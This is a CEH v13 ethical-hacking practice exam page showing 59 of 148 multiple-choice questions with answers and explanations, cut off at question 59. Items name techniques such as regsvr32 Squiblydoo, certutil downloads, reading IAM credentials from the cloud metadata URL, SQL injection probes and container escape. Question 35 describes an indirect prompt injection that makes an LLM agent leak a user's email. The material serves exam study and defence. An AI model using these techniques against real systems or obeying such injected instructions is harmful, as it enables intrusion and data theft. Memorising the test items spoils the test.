Ethical Hacking v13 (312-50) Practice Test – 148 Free Exam Questions with Answers

Ethical Hacking v13 (312-50)

148 questions · instant answer feedback · concise explanations · free

  1. Question 1 of 148In her role as a cybersecurity analyst for an established technology firm, Maria is assigned a crucial task. She's instructed to perform a thorough passive reconnaissance of a major competitor's online environment to understand their digital strategies better. The challenge, however, is to gather as much relevant information as she can without directly interacting with the competitor's systems or alerting them to her activities, to avoid any potential legal implications. Given these constraints and the sensitive nature of her assignment, which of the following tools or methods would be least appropriate and potentially risky for Maria to employ in her task?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Running an intensive port scan against the competitor's public IP addresses to gain information on their internal network and server structure.

    A port scan is active reconnaissance, directly probing the target system and risking detection. Passive methods like public records or archived sites do not directly interact with the target.

  2. Question 2 of 148After a recent breach, your team discovers that attackers used modified versions of legitimate system utilities and a Windows service to persist undetected for weeks, accessing internal credentials. What key step can be taken to better protect against similar future threats? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Monitor file hashes of sensitive executables for unauthorized changes.

    Monitoring file hashes detects unauthorized changes to legitimate executables, a key defense against living-off-the-land attacks. The other options are good practices but less specific.

  3. Question 3 of 148Your role as a cybersecurity analyst at XYZ Corporation requires you to perform a thorough security assessment of the company's online presence. You initiate the process with a passive reconnaissance phase, trying to gather as much information as possible without interacting directly with the target system. Which of the following techniques or tools is least likely to assist you in this endeavor? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Using a tool like Nmap to scan the company's public IP range.

    Nmap is an active reconnaissance tool that directly interacts with the target. Passive reconnaissance involves gathering information without direct system interaction.

  4. Question 4 of 148An attacker uses a 'Side-channel attack' against a cryptographic module by measuring the power consumption during encryption. What is this specific technique called?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Differential Power Analysis (DPA)

    Differential Power Analysis is the specific technique of analyzing power consumption to find cryptographic keys. This is a classic side-channel attack method.

  5. Question 5 of 148You are a cybersecurity analyst at a financial institution. Your company has a strict policy against any unencrypted protocols. You've noticed some data packets being sent via HTTP rather than HTTPS on the network. This raises your concern because HTTP is a protocol that sends data in plaintext. To further investigate this matter, you decide to use a sniffing tool. Which of the following would be the most appropriate choice?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Wireshark

    Wireshark is the industry standard for capturing and analyzing network traffic to inspect packet contents. Other tools listed are not protocol analyzers.

  6. Question 6 of 148An attacker uses a fileless malware technique that utilizes the 'Regsvr32.exe' utility to download and execute a remote COM scriptlet (SCT file). Which of the following best describes this technique?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Squiblydoo

    Squiblydoo is the precise term for using Regsvr32.exe to execute remote SCT files. The other options describe distinct fileless malware techniques.

  7. Question 7 of 148A future-focused security audit discusses risks where attackers collect encrypted data now, anticipating that they can decrypt it later with quantum computers. What is this threat known as?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Saving data today for future quantum decryption

    Saving data for future quantum decryption is the exact threat described. The other options involve active quantum attacks or unrelated quantum concepts.

  8. Question 8 of 148A cybersecurity team identifies suspicious outbound network traffic. Investigation reveals malware utilizing Background Intelligent Transfer Service (BITS) to evade firewall detection. Why would attackers use this particular service to hide malicious activities?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Because BITS packets appear identical to normal Windows update traffic.

    BITS is the correct answer because its traffic mimics legitimate Windows updates, allowing it to blend in and evade detection by firewalls. The other options are incorrect because BITS does not use encrypted DNS, exclusively HTTP, or IP fragmentation.

  9. Question 9 of 148As the newly appointed head of IT security at a growing startup, you have been tasked with improving the company's security posture. Given the rise in social engineering attacks, you decide to set up training sessions for employees to help them identify these threats. During a session, you ask the team to identify the type of social engineering attack where an attacker impersonates a co-worker or an authority figure to extract confidential information. Which option correctly identifies this type of attack?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Pretexting

    Pretexting is the correct answer as it involves creating a fabricated scenario to trick victims into revealing information. Baiting and phishing are different social engineering methods, while quid pro quo involves a service-for-information exchange.

  10. Question 10 of 148You are a security analyst investigating a network compromise. The infected systems are receiving external instructions, masking the control traffic using widely allowed protocols like HTTP and DNS. The payloads are stealthy and modify system components without saving files to disk. What would be the most effective action to detect and disrupt this kind of malware communication?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Use behavioral analytics to monitor for irregular outbound requests and abnormal application behavior.

    Behavioral analytics is the correct answer because it detects anomalies in process activity and network requests, which is necessary for fileless malware that evades signature-based detection. The other options are ineffective against this sophisticated threat.

  11. Question 11 of 148When auditing a CI/CD pipeline, you find that 'Secret Scanning' is disabled. What is the primary risk during the 'Build' phase? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Hardcoded API keys or credentials might be pushed to the container image or public repo.

    This is correct because disabled secret scanning risks exposing credentials during build. The trap is technical issues, not misconfigurations like GPL licensing.

  12. Question 12 of 148As a security analyst, you are testing your company's network for potential vulnerabilities. During your investigation, you suspect that an attacker might be using MAC flooding to compromise the switches and sniff network traffic. Which of the following indicators would most likely confirm your suspicions? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Numerous MAC addresses that correspond to a single switch port.

    This is correct because MAC flooding floods a port with fake addresses. The trap is confusing MAC overflow with IP-MAC mapping issues.

  13. Question 13 of 148A penetration tester is analyzing a mobile application. They find that the app uses a hardcoded API key to communicate with a Firebase backend. In the context of CEH v13, what is the most effective tool to automate the discovery of such secrets in the APK?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. MobSF (Mobile Security Framework)

    MobSF automates APK analysis for hardcoded secrets and vulnerabilities, making it the ideal tool for this scenario. Wireshark and Nmap are network-focused, while John the Ripper is for password cracking, not secret discovery.

  14. Question 14 of 148During a cybersecurity training session at your organization, you present several hypothetical scenarios to the trainees to assess their understanding of social engineering threats. Which of these scenarios best describes a social engineering attack?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Sarah, a new recruit, receives a call from someone claiming to be from the IT department, who asks for her login credentials to solve a non-existing issue.

    The caller impersonating IT to get credentials is classic social engineering. The other options describe physical security, accidental malware, or legitimate monitoring.

  15. Question 15 of 148In your role as a cybersecurity specialist for a growing tech company, you are tasked with performing a regular network scan to check for any potential vulnerabilities. Your manager has specifically asked you to use a NULL scan for this round. In the context of TCP NULL scanning, what response (or lack thereof) would indicate that a particular port on a target machine is closed? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. The target machine responds with a TCP RST packet.

    A TCP RST packet means the port is closed. The RST resets the connection, indicating no service is listening on that specific port.

  16. Question 16 of 148An attacker uses 'Certutil.exe' with the '-urlcache' flag to download a malicious binary. How should a modern EDR be configured to detect this 'Living off the Land' behavior?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Monitor for parent-child process anomalies and network connections initiated by system binaries like certutil.

    Monitoring parent-child process anomalies is the best detection method. Blocking or renaming system binaries breaks legitimate functionality and is not a practical solution.

  17. Question 17 of 148An attacker uses a fileless malware technique that leverages 'mshta.exe' to execute a malicious HTA script stored in a remote server's registry key. Why is this technique highly effective in 2026? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. It bypasses disk-based signature scanning by running in memory.

    Fileless malware using 'mshta.exe' runs in memory, bypassing disk-based signature scanning. Option B describes encryption, not evasion; C and D are unrelated to this specific technique.

  18. Question 18 of 148An attacker examines differences in ciphertext outputs resulting from small changes in the input to deduce key patterns in a symmetric algorithm. What method is being employed?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Differential cryptanalysis on input-output differences

    Differential cryptanalysis analyzes ciphertext differences from small input changes to deduce key patterns in symmetric algorithms. A, C, and D are unrelated cryptographic attack methods.

  19. Question 19 of 148You are a Certified Ethical Hacker hired by a financial institution to assess the robustness of its web application security. In your penetration testing, you are particularly focused on exploiting vulnerabilities related to session management mechanisms. The web application uses multi-factor authentication, encrypted cookies, and has well-configured web application firewalls. During your assessment, you identify several possibilities to compromise session management. Which of the following techniques would most effectively exploit a session management vulnerability while bypassing the application's sophisticated security measures? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Utilize Session Fixation to manipulate a user into utilizing a session ID that an attacker already has access to.

    Session Fixation manipulates a user into using an attacker-controlled session ID, bypassing MFA and encryption. Sidejacking requires interception, CSRF relies on user actions, and deserialization is unrelated.

  20. Question 20 of 148A global media streaming platform is experiencing periodic traffic surges every 10 minutes, severely degrading performance and leading to widespread buffering issues. Traffic analysis reveals intermittent spikes exceeding 300 Gbps, followed by quiet intervals. The security team suspects the attacker is using a technique designed to disrupt services without maintaining a continuous flood. What type of DDoS attack best explains this scenario?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. A Pulse Wave attack leveraging high-volume short bursts to overwhelm network resources.

    A Pulse Wave attack uses high-volume short bursts to overwhelm resources, matching the periodic 300 Gbps spikes. Other options describe sustained attacks, mimicry, or hardware damage.

  21. Question 21 of 148Which of the following describes a 'Poisoning Attack' against a machine learning model used for malware detection? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Modifying the training dataset to include samples that misclassify specific malware as 'Benign'.

    A poisoning attack corrupts the training data to misclassify malware as benign. Option B is a denial-of-service attempt, not a poisoning attack that manipulates model logic.

  22. Question 22 of 148A large media-streaming company begins receiving complaints from users that their web application is timing out or failing to load. The security team observes that the web server is overwhelmed with a high number of open HTTP connections, most of which appear to be legitimate but are transmitting data at an abnormally slow rate. These connections are never fully completed, causing the server's resources to remain occupied and unable to process new incoming client requests. The incident response team rules out bandwidth exhaustion and malformed packet-based attacks and suspects an application-layer DoS technique is responsible. Given the scenario, which specific type of attack is most likely being executed on the company's web application?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. The attacker uses a Slowloris attack to keep many open connections alive, slowly exhausting the server's connection pool.

    Slowloris attacks keep many connections open at a slow rate to exhaust server resources. Option A is a UDP flooding attack, which is not the application-layer technique described.

  23. Question 23 of 148You are a new member of your company's IT team, and you've been assigned to understand and implement ethical hacking principles to improve the company's cybersecurity posture. Your supervisor highlights the importance of following the five phases of ethical hacking. What is the correct order of these phases?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Reconnaissance, Scanning, Gaining Access, Maintaining Access, Covering Tracks

    The correct order is Reconnaissance, Scanning, Gaining Access, Maintaining Access, Covering Tracks. Option A incorrectly starts with Scanning instead of Reconnaissance.

  24. Question 24 of 148You are a Certified Ethical Hacker and have been hired by a financial institution to assess the security of its newly developed web application. The application employs a multifaceted authentication system with JavaScript-based client-side controls. During your testing, you discover that client-side controls enforce password strength and ensure CAPTCHA validation. The application also uses a proprietary encryption algorithm for client-side data. Your goal is to bypass these client-side controls to assess how robust they really are. What method would be the most effective for bypassing these controls without triggering server-side alarms? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Utilize a proxy tool to intercept and modify the client-side controls before they reach the server.

    A proxy tool is the most effective method for bypassing client-side controls, as it intercepts and modifies data before it reaches the server, preventing server-side validation from ever seeing the bypass.

  25. Question 25 of 148While monitoring an IoT network, you notice many devices communicating via MQTT over port 1883. An attacker publishes a message to a command topic with the 'Retain' flag enabled. What does this flag achieve?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. It ensures any new device subscribing to that topic immediately receives the malicious message.

    The 'Retain' flag ensures any new subscriber to a topic receives the last message, allowing an attacker to persist malicious commands that infect new devices without sending new messages.

  26. Question 26 of 148As a security expert for a prominent tech company, you've noticed an increasing number of attacks on your web services. You've concluded that the best course of action is to enhance your patch management strategies. Considering the information presented, which of the following strategies would be most effective in ensuring the secure and efficient management of patches and hotfixes?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Implementing an automatic patch management process and using a patch management tool to monitor the patched systems.

    Automatic patch management is the most effective strategy as it ensures timely, consistent application of patches across all systems, reducing the window of vulnerability.

  27. Question 27 of 148During a cloud security assessment, your team discovered that a former employee still had access to critical resources despite leaving the organization months ago. Which of the following practices could have most effectively prevented this issue? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Enforcing timely user de-provisioning

    This question effectively tests identity and access management (IAM) best practices, a fundamental security control. The other options are secondary controls that don't directly solve the access de-provisioning issue.

  28. Question 28 of 148As a cybersecurity consultant, you have been hired by a multinational corporation to identify potential security risks in their network. During the enumeration phase, you utilize LDAP to gather information about the network infrastructure. However, you observe that some critical information isn't retrievable. What could be the primary reason for this?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. The LDAP directory data is protected by Access Control Lists (ACLs).

    ACLs restrict access to LDAP directory data, preventing enumeration of protected information. This is a fundamental concept of directory service security.

  29. Question 29 of 148An AWS administrator finds that an EC2 instance has been compromised. The attacker used the instance to query 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'. What was the attacker trying to obtain?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Temporary security tokens (Access Key, Secret Key, and Session Token) associated with the instance's IAM role.

    The metadata URL returns temporary IAM credentials, allowing the attacker to access AWS resources. The other options are incorrect, as this URL doesn't return root passwords or VPC keys.

  30. Question 30 of 148Working as an Information Security Analyst at a technology firm, you've been asked to design training material for employees about the potential dangers of session hijacking. As part of the training, you want to explain how attackers could use side jacking to compromise their accounts. Which of the following scenarios would most accurately describe a side jacking attack?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. An attacker intercepts network traffic, captures unencrypted session cookies, and uses these to impersonate the user.

    Side jacking specifically involves capturing unencrypted session cookies from network traffic. The other options describe firewall exploits, XSS, or credential phishing.

  31. Question 31 of 148As a certified ethical hacker, you have been engaged to evaluate the security protocols of a smart city project. This cutting-edge venture incorporates an interconnected system featuring intelligent traffic lights, public Wi-Fi points, and advanced water management facilities. Upon evaluating the IoT network's logs, you stumble upon anomalous traffic patterns, signifying a high volume of data exchange between a particular traffic light and an external IP address. Your further investigation reveals that this traffic light has an inexplicably open port. Given the gravity of these revelations, what would be your subsequent course of action?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Isolate the implicated traffic light from the overarching network for a detailed investigation into its firmware to identify any possible security breaches.

    Isolating the device is the critical first step to contain the threat and safely investigate the firmware. Continuing to allow network traffic is dangerous.

  32. Question 32 of 148A developer is using a CI/CD pipeline and accidentally commits a .env file containing API keys to a private GitHub repository. Which tool should be integrated into the pipeline to prevent this?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Secret Scanning (e.g., TruffleHog or Gitleaks)

    Secret Scanning tools, like TruffleHog, are built specifically to find exposed keys in code. SAST and DAST find code vulnerabilities, not secrets.

  33. Question 33 of 148A penetration tester intercepts HTTP requests between a user and a vulnerable web server. The tester observes that the session ID is embedded in the URL, and the web application does not regenerate the session upon login. Which session hijacking technique is most likely to succeed in this scenario?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Session fixation by pre-setting the token in a URL.

    Session fixation works when a non-regenerated session ID is sent via URL. The attacker can predict this ID before the user authenticates.

  34. Question 34 of 148You are a security consultant who has been hired to conduct security awareness training at a mid-sized organization. During the session on social engineering, you emphasize the importance of being vigilant against different types of social engineering attacks. Which of the following scenarios best describes a tailgating social engineering attack?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. A person gains access to the building by following an employee through a secure door before it closes.

    Tailgating is physically following an authorized person into a restricted area. This is a physical security breach, not a digital one.

  35. Question 35 of 148A security analyst is investigating a compromised LLM-based customer service agent. The attacker sent a hidden instruction within a website that the LLM was summarizing, causing the bot to exfiltrate the current user's email address. What is this attack called?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Indirect Prompt Injection

    Indirect prompt injection is correct because the attacker manipulated external data the LLM processed, not the direct prompt. The other options involve direct manipulation or evasion techniques not applicable here.

  36. Question 36 of 148A cybersecurity team is assessing an organization's network for misconfigurations. During the enumeration process, they use a tool that sends a request to UDP port 161 and receives a large list of software names installed on remote devices. The operation is successful due to the use of a publicly known community string. What enabled this enumeration technique to work so effectively? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. The SNMP agent allowed anonymous bulk data queries due to default settings.

    Anonymous bulk data queries via SNMP's default community string enabled this. The other options describe unrelated vulnerabilities like FTP or registry access.

  37. Question 37 of 148During a penetration test, a security analyst encounters a web page that returns identical generic error messages regardless of input. To test for SQL injection, they submit a query that includes AND 1=1 and later AND 1=2, observing a change in the page content. What type of injection is being tested?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. The analyst is using conditional logic to infer database behavior from page responses.

    Conditional logic testing is correct because the analyst inferred database behavior from page differences. The other options describe error-based or time-based techniques.

  38. Question 38 of 148In a highly secure online banking environment, customers have reported unauthorized access to their accounts despite robust authentication measures in place. Upon investigation, it is discovered that attackers are employing sophisticated session hijacking techniques to compromise user sessions and conduct fraudulent transactions. The security team is tasked with implementing effective countermeasures to prevent further unauthorized access and protect customer accounts. Considering the scenario described, which advanced session-hijacking technique, resembling a scenario-based attack, poses the greatest challenge for the security team to detect and mitigate effectively, potentially compromising the security of online banking transactions? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Man-in-the-Browser (MitB) Attack Installing Malicious Browser Extensions to Intercept User Sessions

    Man-in-the-Browser (MitB) is the correct answer because it attacks the browser layer after authentication, making it exceptionally hard for servers to detect and severely compromising real-time transactions. The other options are detectable by network or server-side security controls.

  39. Question 39 of 148As a Certified Ethical Hacker, you have been contracted by a leading technology company to test the vulnerabilities in its web application. The application integrates various third-party services and employs multiple APIs. During your advanced testing, you discover a particularly robust Web API that is designed to work with several webhooks. Additionally, you find that the server has a web shell planted for legitimate administrative tasks. Your objective is to exploit vulnerabilities related to the Web API, webhooks, and web shell. What technique would best allow you to compromise the system effectively while leaving minimal traces?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Utilize SSRF (Server-Side Request Forgery) to make unauthorized API calls from the server itself.

    SSRF is the correct answer because it abuses server trust to make internal calls, bypassing client-side defenses. The other options are direct and more likely to leave traces, whereas SSRF allows for stealthy, indirect exploitation.

  40. Question 40 of 148A corporation has transitioned to a public cloud service. The security team found a critical flaw in the API of the cloud service provider. What is the potential threat they are most likely to face?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Unauthorized access to cloud resources

    Unauthorized access to cloud resources is the correct answer, as API flaws are a direct vector for compromising cloud environments. Physical security and data encryption are less likely threats from an API vulnerability.

  41. Question 41 of 148During a vulnerability assessment of a Kubernetes cluster, you identify a pod with 'hostNetwork: true' and 'privileged: true'. What is the most significant risk associated with this configuration?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. The pod can sniff traffic from the node's network interfaces and potentially escape the container.

    This is correct because 'hostNetwork: true' and 'privileged: true' allow the pod to access the host's network, enabling packet sniffing. The trap is confusing network access with isolation or encryption.

  42. Question 42 of 148As a cybersecurity professional conducting a network vulnerability assessment for your organization, you discover a potentially critical vulnerability. This vulnerability arises from an outdated software component installed on a critical production server used by the financial department. The software vendor has acknowledged this vulnerability and promptly released a patch to fix it. However, the application of the patch has been deferred due to the department's operational needs, as they cannot tolerate downtime during business hours, which would significantly impact their productivity. The situation poses a significant risk due to the potential for exploitation until the patch is applied. With these constraints in mind, as a Certified Ethical Hacker, what immediate action could you undertake to reduce the risk associated with this vulnerability without disrupting department operations? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Implement a strategy of Virtual Patching, providing a protective layer around the vulnerability until the actual patch can be applied.

    This is correct because virtual patching mitigates risk without downtime. The trap is reactive monitoring versus proactive protection.

  43. Question 43 of 148As part of a security audit, your team evaluates a system flagged by your automated scanner. The tool outputs a vector string with a numerical range of 9.8, indicating a critical severity. However, the client is unsure about the real-world implications of this score. You are tasked with explaining what this score conveys and how it was derived. Which of the following best explains the purpose and benefit of this type of rating in prioritizing remediation efforts?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. It quantifies technical impact and ease of exploitation, guiding structured risk response based on impact and environment.

    This is correct because severity scores quantify exploitability and impact. The trap is prioritizing automation over risk-based decisions.

  44. Question 44 of 148A red team operator is conducting reconnaissance on a financial organization's infrastructure. While probing UDP port 123, they send NTP queries and receive a list of internal IP addresses and connected hostnames. The organization is unaware that sensitive network details are exposed externally. What is the most likely reason for this information disclosure?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. The NTP daemon is configured to accept queries from external sources without restriction.

    This is correct because unrestricted NTP queries leak internal hostnames. The trap is misinterpreting firewall misconfigurations as DNS issues.

  45. Question 45 of 148During a pentest of a Kubernetes cluster, you find a pod running with 'privileged: true' and the 'hostPID: true' flag. Which technique is most effective for escaping to the underlying node?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Accessing the host's /proc directory to inject code into a host process.

    The 'hostPID: true' flag allows a privileged pod to access the host's /proc directory, enabling process injection onto the node. This is a direct path to root escape, whereas brute-forcing certificates is less reliable and scanning NodePorts doesn't grant host access.

  46. Question 46 of 148A cybersecurity firm has deployed a comprehensive defense system, including Intrusion Detection Systems (IDS), firewalls, and honeypots, to protect its network from malicious activities. Despite these measures, the security team has noticed suspicious traffic patterns indicating potential attempts to evade detection and breach the network perimeter. The team is tasked with identifying advanced evasion techniques and strengthening the defense mechanisms to mitigate emerging threats effectively. Given the scenario described, which sophisticated evasion technique, resembling a scenario-based attack, poses the greatest challenge for the security team to detect and mitigate effectively, potentially compromising the integrity of the cybersecurity firm's network?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Covert Channel Communication Exploiting Unused IP Header Fields to Conceal Malicious Traffic and Evade Detection by Security Devices

    Covert channels hide malicious traffic within protocol fields, making it invisible to traditional IDS and firewall inspection. This is more challenging to detect than polymorphic malware or protocol fragmentation, which are more easily flagged by signature-based systems.

  47. Question 47 of 148An attacker successfully executes a 'Side-channel attack' by analyzing the electromagnetic emissions of a specialized IoT hardware device while it processes RSA keys. What is this specific technique? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. TEMPEST / Analysis of emanations

    TEMPEST involves analyzing electromagnetic emanations to extract data, which is a classic side-channel technique. The other options are unrelated—session hijacking, social engineering, and brute force exploit different attack vectors entirely.

  48. Question 48 of 148A multinational company is planning to integrate an IoT-based environmental control system for its manufacturing units worldwide. They engage a cybersecurity team to ensure that the new system remains secure from any potential threats. The cybersecurity team is tasked with identifying the most likely method an advanced persistent threat (APT) group might use to compromise the new IoT-based environmental control system. What is the most plausible attack vector? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. The APT group will exploit zero-day vulnerabilities present in the IoT device firmware.

    APT groups commonly exploit zero-day vulnerabilities in IoT firmware since patches are unavailable, giving them direct system access. Credential theft or MITM attacks require initial compromises, which zero-days bypass entirely.

  49. Question 49 of 148A cybersecurity analyst notices that a large number of plaintext-ciphertext pairs were used in an attempted attack against a block cipher. The attacker applied statistical analysis to XOR combinations of specific plaintext and ciphertext bits. Which technique is the attacker likely using?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Deriving linear patterns from cipher behavior

    Linear cryptanalysis is correct because it exploits statistical relationships between plaintext and ciphertext bits to find the key. The other options describe different attacks like brute force or differential cryptanalysis.

  50. Question 50 of 148You're a security analyst conducting a foot printing exercise for a new client to uncover as much information as possible without direct interaction. Your preliminary investigation using search engines and public databases has provided a significant amount of data about the organization's online presence. You are now considering using Google Hacking techniques to find further vulnerabilities. Which of the following could best justify this decision?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Google Hacking can help identify weaknesses in the client's website code.

    Google Hacking finds exposed code vulnerabilities. It can't map internal networks reliably or access the deep web directly, making it less suitable for those tasks.

  51. Question 51 of 148An attacker intercepts a Bluetooth Low Energy (BLE) connection and performs a 'GATT Replay Attack'. Which of the following would have prevented this?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Implementing 'Link Layer' encryption and using sequence numbers or timestamps.

    Link Layer encryption and sequence numbers or timestamps prevent a GATT Replay Attack by making each transmission unique and ensuring data integrity, which is the correct defense.

  52. Question 52 of 148A senior executive receives a personalized email with a subject line that reads "Annual Performance Review 2024." The email contains a downloadable PDF that installs a backdoor when opened. The email appears to come from the CEO and includes company branding. Which phishing method does this best illustrate?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Whaling attack aimed at high-ranking personnel

    A whaling attack targets high-ranking executives with highly personalized and convincing emails, as seen in this scenario where the email impersonates the CEO.

  53. Question 53 of 148In your role as a cybersecurity analyst at a large e-commerce company, you have been tasked with reinforcing the firm's defences against potential Denial-of-Service (DoS) attacks. During a recent review, you noticed several IP addresses generating excessive traffic, causing an unnaturally high load on the server. An inspection of these packets revealed that the TCP three-way handshake was never completed, leaving multiple connections in a SYN_RECEIVED state. The intent appears to be the saturation of server resources without any genuine intent to establish a full connection. Given these details, what type of DoS attack is most likely being executed against the company's servers?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. SYN Flood: This attack floods a target with SYN requests in an attempt to consume enough server resources to make the system unresponsive, aligning with the high volume of incomplete TCP handshakes.

    A SYN Flood attack is identified by a high volume of incomplete TCP three-way handshakes, which leaves connections in a SYN_RECEIVED state to saturate server resources.

  54. Question 54 of 148You have been hired by a government agency to evaluate Android smartphones' resistance against covert surveillance. During your assessment, you want to demonstrate whether attackers could eavesdrop on sensitive conversations conducted through the loudspeaker without special permissions by exploiting built-in smartphone sensors. Which specific attack technique should you implement to effectively demonstrate this privacy risk?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Spearphone attack exploiting accelerometer-based vulnerabilities.

    The Spearphone attack exploits accelerometer-based vulnerabilities to eavesdrop on loudspeaker audio without special permissions. The other options focus on unrelated attack vectors like NFC or application manipulation, which are less relevant to this specific sensor-based privacy risk.

  55. Question 55 of 148At DEF Corporation, as you dive deeper into the vulnerability analysis of their multi-tiered web applications, you observe an anomaly. Some encrypted user session tokens appear to be much longer than others, hinting at possible variable encryption strength based on user roles. This inconsistency could expose certain user sessions, especially those with elevated privileges, to cryptographic attacks. Given the intricate nature of the system and the potential implications of a breach, what would be the most appropriate step to mitigate this specific vulnerability?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Implement uniform encryption strength across all user roles, eliminating disparities in session token lengths.

    Implementing uniform encryption strength eliminates variable token lengths, ensuring consistent protection against cryptographic attacks. MFA, key rotation, and logging are good practices but don't directly address the core cryptographic vulnerability.

  56. Question 56 of 148In a Kubernetes environment, what is the purpose of a 'Sidecar Container' from a security perspective when implementing a Service Mesh?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. To provide mTLS (mutual TLS) and fine-grained traffic encryption between microservices.

    A Sidecar Container provides mTLS and fine-grained encryption between microservices in a Service Mesh. Options A, B, and D describe unrelated functions like logging, performance, or redundancy.

  57. Question 57 of 148You work as a network security officer for a large corporation. Recently, you've noticed that certain confidential files are being accessed by unauthorized users within the network. You suspect that a Man-in-the-Middle (MitM) attack is being carried out. Which of the following network activities would help you confirm this?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. IP addresses being resolved to multiple MAC addresses.

    IPs resolving to multiple MACs indicate a MitM attack, as one IP should map to one MAC. Other options suggest general anomalies but not specific MitM behavior.

  58. Question 58 of 148A Certified Ethical Hacker (CEH) is investigating a recent attack on a company's web server. The server hosts multiple domains and uses a web proxy to maintain anonymity and prevent IP blocking. The CEH discovers that the server's document root directory, which stores critical HTML files, is named "certroot" and is stored in the directory /admin/web. The server root, which stores the server's configuration, error, executable, and log files, is also identified. The CEH also notes that the server uses a virtual document tree for additional storage. The server was compromised via a DNS server hijacking attack where the attacker redirected all requests coming towards the target web server to their own malicious server. Given this scenario which of the following actions would most likely prevent such an attack in the future?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Implementing DNSSEC on the DNS server

    DNSSEC prevents DNS hijacking by digitally signing records to prevent tampering. Updating software or changing IPs doesn't stop DNS redirection, and LAMP is unrelated.

  59. Question 59 of 148During a routine security audit at a large financial services organization, the IT team detects severe network latency and recurring bandwidth exhaustion across its corporate WAN links. Upon deeper investigation, they discover that several employee workstations and IoT-connected devices are unknowingly transmitting enormous volumes of traffic to numerous external IP addresses. These devices, all exhibiting similar traffic patterns and command-response behaviors, are found to be under the control of a remote botnet operator. The incident raises serious concerns about insider-originated denial-of-service activity that is also affecting external entities. Which type of denial-of-service attack best describes the organization's current situation? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

